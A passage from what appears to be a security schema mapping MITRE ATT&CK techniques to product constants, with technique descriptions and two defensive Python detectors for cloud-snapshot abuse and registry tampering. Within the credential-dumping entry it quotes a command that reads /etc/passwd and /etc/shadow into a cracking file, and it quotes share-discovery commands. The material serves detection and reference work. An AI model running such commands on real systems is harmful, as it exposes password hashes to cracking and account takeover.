(LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once
patched, an adversary can use the injected password to successfully authenticate as any domain user
account (until the skeleton key is erased from memory by a reboot of the domain controller).
Authenticated access may enable unfettered access to hosts and/or resources within single-factor
authentication environments.(Citation: Dell Skeleton) https://attack.mitre.org/techniques/T1556/001
T1556.004 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_NETWORK_DEVICE_AUTHENTICATION Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a
password in the operating system, thus bypassing native authentication mechanisms for local accounts
on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include
implanted code to the operating system for network devices to provide access for adversaries using a
specific password. The modification includes a specific password which is implanted in the operating
system image via the patch. Upon authentication attempts, the inserted code will first check to see if the
user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials
on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock) https://attack.mitre.org/
techniques/T1556/004
T1556.002 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_PASSWORD_FILTER_DLL Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication
process to acquire user credentials as they are validated. Windows password filters are password policy
enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing
a method to validate potential passwords against password policies. Filter DLLs can be positioned on local
computers for local accounts and/or domain controllers for domain accounts. Before registering new
passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation
from each registered filter. Any potential changes cannot take effect until every registered filter
acknowledges validation. Adversaries can register malicious password filters to harvest credentials from
local computers and/or entire domains. To perform proper validation, filters must receive plain-text
credentials from the LSA. A malicious password filter would receive these plain-text credentials every time
a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013) https://attack.mitre.org/
techniques/T1556/002
T1556.003 XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_PLUGGABLE_AUTHENTICATION_MODULES Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable
otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and
executable files which guide authentication for many services. The most common authentication module is
pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /
etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM) Adversaries may
modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can
be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect
PAM resources with code to harvest user credentials, since the values exchanged with PAM components
may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM) https://
attack.mitre.org/techniques/T1556/003
T1578 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A
modification to the compute service infrastructure can include the creation, deletion, or modification of one
or more components such as compute instances, virtual machines, and snapshots. Permissions gained
from the modification of infrastructure components may bypass restrictions that prevent access to existing
infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and
remove evidence of their presence.(Citation: Mandiant M-Trends 2020) https://attack.mitre.org/techniques/
T1578
T1578.002 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_CREATE_CLOUD_INSTANCE An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud
account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and
permissions that exist on instances currently residing within an account. An adversary may [Create
Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a
new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from
Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://
attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020) Creating a new instance may
also allow an adversary to carry out malicious activity within an environment without affecting the execution
of current running instances. https://attack.mitre.org/techniques/T1578/002
T1578.001 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_CREATE_SNAPSHOT An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot
is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard
drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass
restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance]
(https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade
detection and remove evidence of their presence. An adversary may [Create Cloud Instance](https://
attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then
apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows
them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020) https://attack.mitre.org/
techniques/T1578/001
T1578.003 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_DELETE_CLOUD_INSTANCE An adversary may delete a cloud instance after they have performed malicious activities in an attempt to
evade detection and remove evidence of their presence. Deleting an instance or virtual machine can
remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not
recoverable. An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002)
and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020) https://
attack.mitre.org/techniques/T1578/003
T1578.004 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_REVERT_CLOUD_INSTANCE An adversary may revert changes made to a cloud instance after they have performed malicious activities
in an attempt to evade detection and remove evidence of their presence. In highly virtualized environments,
such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data
storage snapshots through the cloud management dashboard or cloud APIs. Another variation of this
technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide
various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset
upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore
Cloud Snapshot) https://attack.mitre.org/techniques/T1578/004
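The T1578.001 and T1578.002 descriptions above lay out one chain: create a snapshot, create a new instance, then open inbound SSH to it, all by the same principal. Below is an added example, not XSIAM code and not part of this schema, that correlates that chain over a stream of cloud audit events. The event names follow the AWS EC2 API as CloudTrail records them (CreateSnapshot, RunInstances, AuthorizeSecurityGroupIngress), which is an assumption; the event layout, the two-hour window and the sample events are constructed for the example.

```python
"""Correlate snapshot -> new instance -> inbound SSH per acting principal (T1578.001/.002)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

T_SNAPSHOT = "XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_CREATE_SNAPSHOT"
T_INSTANCE = "XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_CREATE_CLOUD_INSTANCE"

WINDOW = timedelta(hours=2)  # assumed: maximum spread of the three steps


def opens_ssh(event: Dict) -> bool:
    """True when an ingress rule added by the event covers TCP/22 (constructed rule layout)."""
    if event["name"] != "AuthorizeSecurityGroupIngress":
        return False
    return any(r["from_port"] <= 22 <= r["to_port"] for r in event.get("rules", []))


def correlate(events: List[Dict]) -> List[Dict]:
    """One finding per actor whose events complete the chain, in order, within WINDOW."""
    by_actor = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_actor[e["actor"]].append(e)
    findings = []
    for actor, evs in by_actor.items():
        start = None           # time of the snapshot that opened the current chain
        instance_seen = False
        for e in evs:
            if e["name"] == "CreateSnapshot":
                start, instance_seen = e["time"], False   # (re)start the chain
            elif start is None or e["time"] - start > WINDOW:
                start = None                               # no open chain, or it expired
            elif e["name"] == "RunInstances":
                instance_seen = True
            elif instance_seen and opens_ssh(e):
                findings.append({"actor": actor, "first_seen": start, "last_seen": e["time"],
                                 "techniques": [T_SNAPSHOT, T_INSTANCE]})
                start = None
    return findings


# Constructed sample events (not real telemetry): a scheduled backup, an admin opening
# SSH with no snapshot, and one principal performing the full chain.
T0 = datetime(2024, 1, 15, 9, 0)
SAMPLE_EVENTS = [
    {"time": T0, "actor": "svc-backup", "name": "CreateSnapshot"},
    {"time": T0 + timedelta(minutes=5), "actor": "dev-ops-1",
     "name": "AuthorizeSecurityGroupIngress", "rules": [{"from_port": 22, "to_port": 22}]},
    {"time": T0 + timedelta(minutes=10), "actor": "contractor-7", "name": "CreateSnapshot"},
    {"time": T0 + timedelta(minutes=25), "actor": "contractor-7", "name": "RunInstances"},
    {"time": T0 + timedelta(minutes=31), "actor": "contractor-7",
     "name": "AuthorizeSecurityGroupIngress", "rules": [{"from_port": 0, "to_port": 65535}]},
]


def correlate_samples() -> List[Dict]:
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in correlate_samples():
        print(f["actor"], f["first_seen"], "->", f["last_seen"], f["techniques"])
```

Each step alone is routine administration, which is why the individual events are not flagged; only the ordered sequence by one principal produces a finding, and a new snapshot restarts the chain so an old backup cannot pair with an unrelated instance hours later.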
T1112 XDM_CONST.MITRE_TECHNIQUE_MODIFY_REGISTRY Adversaries may interact with the Windows Registry to hide configuration information within Registry keys,
remove information as part of cleaning up, or as part of other techniques to aid in persistence and
execution. Access to specific areas of the Registry depends on account permissions, some requiring
administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/
software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other
tools may also be used, such as a remote access tool, which may contain functionality to interact with the
Registry through the Windows API. Registry modifications may also include actions to hide keys, such as
prepending key names with a null character, which will cause an error and/or be ignored when read via
[Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft
Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands
used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding
Reg Jul 2017) The Registry of a remote system may be modified to aid in execution of files as part of lateral
movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft
Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access
to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for
RPC communication. https://attack.mitre.org/techniques/T1112
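Two of the registry behaviours described above are directly testable on a single registry-write event: a new DLL appearing in the Notification Packages list that T1556.002 depends on, and the null-prefixed key or value names that T1112 describes as hidden from reg.exe and other Win32-API tools. The following is an added example, not XSIAM code and not part of this schema, that tags such events with the page's constants. The event layout, the baseline filter list (scecli everywhere, RASSFM on domain controllers) and the sample events are assumptions constructed for the example.

```python
"""Tag registry-write events for a new password filter DLL (T1556.002) and
null-prefixed, pseudo-hidden key or value names (T1112)."""
from typing import Dict, List

LSA_KEY = r"hklm\system\currentcontrolset\control\lsa"
NOTIFICATION_VALUE = "notification packages"
# Assumed baseline: the filters Windows registers itself. Anything else in the
# list was added by someone.
BASELINE_FILTERS = {"scecli", "rassfm"}

T_PASSWORD_FILTER = "XDM_CONST.MITRE_TECHNIQUE_MODIFY_AUTHENTICATION_PROCESS_PASSWORD_FILTER_DLL"
T_MODIFY_REGISTRY = "XDM_CONST.MITRE_TECHNIQUE_MODIFY_REGISTRY"


def normalize_key(key: str) -> str:
    """Lower-case and shorten the hive prefix so the comparison is exact."""
    key = key.replace("HKEY_LOCAL_MACHINE", "HKLM").replace("HKEY_CURRENT_USER", "HKCU")
    return key.lower().rstrip("\\")


def classify_registry_event(event: Dict) -> List[str]:
    """Return the technique constants a single registry write matches.

    Constructed event layout: key (str), value_name (str), data (list of str for a
    REG_MULTI_SZ value, otherwise str)."""
    hits = []
    key = normalize_key(event["key"])
    value_name = event.get("value_name", "")
    # T1112: a NUL at the start of a key or value name makes Win32 tools such as
    # reg.exe fail to read or display it, while the native API handles it fine.
    if value_name.startswith("\x00") or "\\\x00" in key:
        hits.append(T_MODIFY_REGISTRY)
    # T1556.002: every DLL named in Lsa\Notification Packages receives the plaintext
    # password on each change, so any name outside the baseline is a new filter.
    if key == LSA_KEY and value_name.lower() == NOTIFICATION_VALUE:
        data = event.get("data", [])
        names = data if isinstance(data, list) else [data]
        added = {n.strip().lower() for n in names if n.strip()} - BASELINE_FILTERS
        if added:
            hits.append(T_PASSWORD_FILTER)
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"key": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa",
     "value_name": "Notification Packages", "data": ["scecli", "rassfm", "lsaext"]},
    {"key": r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa",
     "value_name": "Notification Packages", "data": ["scecli"]},
    {"key": "HKCU\\Software\\Classes\\CLSID\\\x00hidden",
     "value_name": "", "data": "wscript.exe"},
    {"key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "OneDrive", "data": "OneDrive.exe"},
]


def classify_samples() -> List[List[str]]:
    return [classify_registry_event(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, classify_samples()):
        print(repr(event["key"]), repr(event["value_name"]), "->", hits)
```

The Notification Packages check deliberately compares against a baseline rather than alerting on any write to the value, since Group Policy and security-configuration tooling rewrite it legitimately; the NUL check, by contrast, has no benign explanation and is worth alerting on outright.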
T1601 XDM_CONST.MITRE_TECHNIQUE_MODIFY_SYSTEM_IMAGE Adversaries may make changes to the operating system of embedded network devices to weaken
defenses and provide new capabilities for themselves. On such devices, the operating systems are typically
monolithic and most of the device functionality and capabilities are contained within a single file. To change
the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This
can either be done live in memory during system runtime for immediate effect, or in storage to implement
the change on the next boot of the network device. https://attack.mitre.org/techniques/T1601
T1601.002 XDM_CONST.MITRE_TECHNIQUE_MODIFY_SYSTEM_IMAGE_DOWNGRADE_SYSTEM_IMAGE Adversaries may install an older version of the operating system of a network device to weaken security.
Older operating system versions on network devices often have weaker encryption ciphers and, in general,
fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution) On embedded devices,
downgrading the version typically only requires replacing the operating system file in storage. With most
embedded devices, this can be achieved by downloading a copy of the desired version of the operating
system file and reconfiguring the device to boot from that file on next system restart. The adversary could
then restart the device to implement the change immediately or they could wait until the next time the
system restarts. Downgrading the system image to an older version may allow an adversary to evade
defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).
Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch
System Image](https://attack.mitre.org/techniques/T1601/001). https://attack.mitre.org/techniques/
T1601/002
T1601.001 XDM_CONST.MITRE_TECHNIQUE_MODIFY_SYSTEM_IMAGE_PATCH_SYSTEM_IMAGE Adversaries may modify the operating system of a network device to introduce new capabilities or weaken
existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth)
(Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen
of the Dead) Some network devices are built with a monolithic architecture, where the entire operating
system and most of the functionality of the device is contained within a single file. Adversaries may change
this file in storage, to be loaded in a future boot, or in memory during runtime. To change the operating
system in storage, the adversary will typically use the standard procedures available to device operators.
This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP,
SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of
it and the device reconfigured to boot to the compromised image. To change the operating system in
memory, the adversary typically can use one of two methods. In the first, the adversary would make use of
native debug commands in the original, unaltered running operating system that allow them to directly
modify the relevant memory addresses containing the running operating system. This method typically
requires administrative level access to the device. In the second method for changing the operating system
in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software
that loads when the device starts that, in turn, will launch the operating system. Adversaries may use
malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://
attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in
memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the
adversary, allowing them to patch the live operating system during runtime. By modifying the instructions
stored in the system image file, adversaries may either weaken existing defenses or provision new
capabilities that the device did not have before. Examples of existing defenses that can be impeded include
encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network
Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via
[Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the
adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy]
(https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/
T1205/001). Adversaries may also compromise existing commands in the operating system to produce
false output to mislead defenders. When this method is used in conjunction with [Downgrade System
Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command
may include changing the output of the command that shows the version of the currently running operating
system. By patching the operating system, the adversary can change this command to instead display the
original, higher revision number that they replaced through the system downgrade. When the operating
system is patched in storage, this can be achieved in either the resident storage (typically a form of flash
memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). When the
technique is performed on the running operating system in memory and not on the stored copy, this
technique will not survive across reboots. However, live memory modification of the operating system can
be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence.
https://attack.mitre.org/techniques/T1601/001
T1104 XDM_CONST.MITRE_TECHNIQUE_MULTI_STAGE_CHANNELS Adversaries may create multiple stages for command and control that are employed under different
conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel
to make detection more difficult. Remote access tools will call back to the first-stage command and control
server for instructions. The first stage may have automated capabilities to collect basic host information,
update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that
point to redirect the host to the second-stage command and control server. The second stage will likely be
more fully featured and allow the adversary to interact with the system through a reverse shell and
additional RAT features. The different stages will likely be hosted separately with no overlapping
infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://
attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and
blocked. https://attack.mitre.org/techniques/T1104
T1106 XDM_CONST.MITRE_TECHNIQUE_NATIVE_API Adversaries may interact with the native OS application programming interface (API) to execute behaviors.
Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those
involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel
API) These native APIs are leveraged by the OS during system boot (when other system components are
not yet initialized) as well as carrying out tasks and requests during routine operations. Native API functions
(such as NtCreateProcess) may be directly invoked via system calls / syscalls, but these features are
also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)
(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the
Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.
(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run
a CLI command, load modules, etc. as thousands of similar API functions exist for various system
operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks,
such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These
frameworks typically provide language wrappers/abstractions to API functionalities and are designed for
ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS
Cocoa)(Citation: macOS Foundation) Adversaries may abuse these OS API functions as a means of
executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/
T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize
various components of a victimized system. While invoking API functions, adversaries may also attempt to
bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://
attack.mitre.org/techniques/T1562/001)). https://attack.mitre.org/techniques/T1106
T1599 XDM_CONST.MITRE_TECHNIQUE_NETWORK_BOUNDARY_BRIDGING Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these
devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted
and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between
trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy
in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by
prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.
To participate with the rest of the network, these devices can be directly addressable or transparent, but
their mode of operation has no bearing on how the adversary can bypass them when compromised. When
an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass
normally prohibited traffic across the trust boundary between the two separated networks without
hindrance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow
the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-
hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication]
(https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate
organizations, the adversary can also facilitate lateral movement into new victim environments. https://
attack.mitre.org/techniques/T1599
T1599.001 XDM_CONST.MITRE_TECHNIQUE_NETWORK_BOUNDARY_BRIDGING_NETWORK_ADDRESS_TRANSLATION_TRAVERSAL Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation
(NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on
traffic routing that otherwise separate trusted and untrusted networks. Network devices such as routers and
firewalls that connect multiple networks together may implement NAT during the process of passing
packets between networks. When performing NAT, the network device will rewrite the source and/or
destination addresses of the IP address header. Some network designs require NAT for the packets to
cross the border device. A typical example of this is environments where internal networks make use of
non-Internet routable addresses.(Citation: RFC1918) When an adversary gains control of a network
boundary device, they can either leverage existing NAT configurations to send traffic between two
separated networks, or they can implement NAT configurations of their own design. In the case of network
designs that require NAT to function, this enables the adversary to overcome inherent routing limitations
that would normally prevent them from accessing protected systems behind the border device. In the case
of network designs that do not require NAT, address translation can be used by adversaries to obscure their
activities, as changing the addresses of packets that traverse a network boundary device can make
monitoring data transmissions more challenging for defenders. Adversaries may use [Patch System Image]
(https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device,
implementing their own custom NAT mechanisms to further obscure their activities. https://attack.mitre.org/
techniques/T1599/001
T1498 XDM_CONST.MITRE_TECHNIQUE_NETWORK_DENIAL_OF_SERVICE Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of
targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services
rely on. Example resources include specific websites, email services, DNS, and web-based applications.
Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye
OpPoisonedHandover February 2016) and to support other malicious activities, including
distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec
DDoS October 2014) A Network DoS will occur when the bandwidth capacity of the network connection to a
system is exhausted due to the volume of malicious traffic directed at the resource or the network
connections and network devices the resource relies on. For example, an adversary may send 10Gbps of
traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be
generated by a single system or multiple systems spread across the internet, which is commonly referred to
as a distributed DoS (DDoS). To perform Network DoS attacks several aspects apply to multiple methods,
including IP address spoofing, and botnets. Adversaries may use the original IP address of an attacking
system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking
system or to enable reflection. This can increase the difficulty defenders have in defending against the
attack by reducing or eliminating the effectiveness of filtering by the source address on network defense
devices. For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://
attack.mitre.org/techniques/T1499). https://attack.mitre.org/techniques/T1498
T1498.001 XDM_CONST.MITRE_TECHNIQUE_NETWORK_DENIAL_OF_SERVICE_DIRECT_NETWORK_FLOOD Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network
traffic to a target. [Direct Network Floods](https://attack.mitre.org/techniques/T1498/001) occur when one or
more systems are used to send a high-volume of network packets towards the targeted service's network.
Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are
commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to
conduct network flooding attacks against networks and services. Large botnets can generate a significant
amount of traffic from systems spread across the global Internet. Adversaries may have the resources to
build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an
attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the
flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate
the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes
exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such
as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March
2016) https://attack.mitre.org/techniques/T1498/001
T1498.002 XDM_CONST.MITRE_TECHNIQUE_NETWORK_DENIAL_OF_SERVICE_REFLECTION_AMPLIFICATION Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a
target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will
respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An
adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the
victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a
botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation:
Cloudflare ReflectionDoS May 2017) Reflection attacks often take advantage of protocols with larger
responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification
attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of
magnitude greater than the requests sent to the amplifiers. The extent of this increase will depend upon
many variables, such as the protocol in question, the technique used, and the amplifying servers that
actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection
Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare
NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor
AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol,
with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb
2018) https://attack.mitre.org/techniques/T1498/002
T1046 XDM_CONST.MITRE_TECHNIQUE_NETWORK_SERVICE_SCANNING Adversaries may attempt to get a listing of services running on remote hosts, including those that may be
vulnerable to remote software exploitation. Methods to acquire this information include port scans and
vulnerability scans using tools that are brought onto a system. Within cloud environments, adversaries may
attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is
connected to an on-premises environment, adversaries may be able to identify services running on non-
cloud systems as well. https://attack.mitre.org/techniques/T1046
T1135 XDM_CONST.MITRE_TECHNIQUE_NETWORK_SHARE_DISCOVERY Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of
information to gather as a precursor for Collection and to identify potential systems of interest for Lateral
Movement. Networks often contain shared network drives and folders that enable users to access file
directories on various systems across a network. File sharing over a Windows network occurs over the
SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://
attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using
the net view \\remotesystem command. It can also be used to query shared drives on the local
system using net share. For macOS, the sharing -l command lists all shared points used for smb
services. https://attack.mitre.org/techniques/T1135
T1040 XDM_CONST.MITRE_TECHNIQUE_NETWORK_SNIFFING Adversaries may sniff network traffic to capture information about an environment, including authentication
material passed over the network. Network sniffing refers to using the network interface on a system to
monitor or capture information sent over a wired or wireless connection. An adversary may place a network
interface into promiscuous mode to passively access data in transit over the network, or use span ports to
capture a larger amount of data. Data captured via this technique may include user credentials, especially
those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such
as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be
used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and
other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral
Movement and/or Defense Evasion activities. https://attack.mitre.org/techniques/T1040
T1095 XDM_CONST.MITRE_TECHNIQUE_NON_APPLICATION_LAYER_PROTOCOL Adversaries may use a non-application layer protocol for communication between host and C2 server or
among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI)
Specific examples include use of network layer protocols, such as the Internet Control Message Protocol
(ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such
as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because
ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts;
(Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as
TCP or UDP and may be used by adversaries to hide communications. https://attack.mitre.org/techniques/
T1095
T1571 XDM_CONST.MITRE_TECHNIQUE_NON_STANDARD_PORT Adversaries may communicate using a protocol and port pairing that are typically not associated. For
example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent
Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard
port used by a protocol to bypass filtering or muddle analysis/parsing of network data. https://
attack.mitre.org/techniques/T1571
T1003 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING Adversaries may attempt to dump credentials to obtain account login and credential material, normally in
the form of a hash or a clear text password, from the operating system and software. Credentials can then
be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted
information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries
and professional security testers. Additional custom tools likely exist as well. https://attack.mitre.org/
techniques/T1003
T1003.008 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_PASSWD_AND_SHADOW Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline
password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/
shadow to store user account information including password hashes in /etc/shadow. By default, /etc/
shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) The Linux
utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities
such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db https://attack.mitre.org/techniques/T1003/008
T1003.005 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_CACHED_DOMAIN_CREDENTIALS Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the
event a domain controller is unavailable.(Citation: Microsoft - Cached Creds) On Windows Vista and newer,
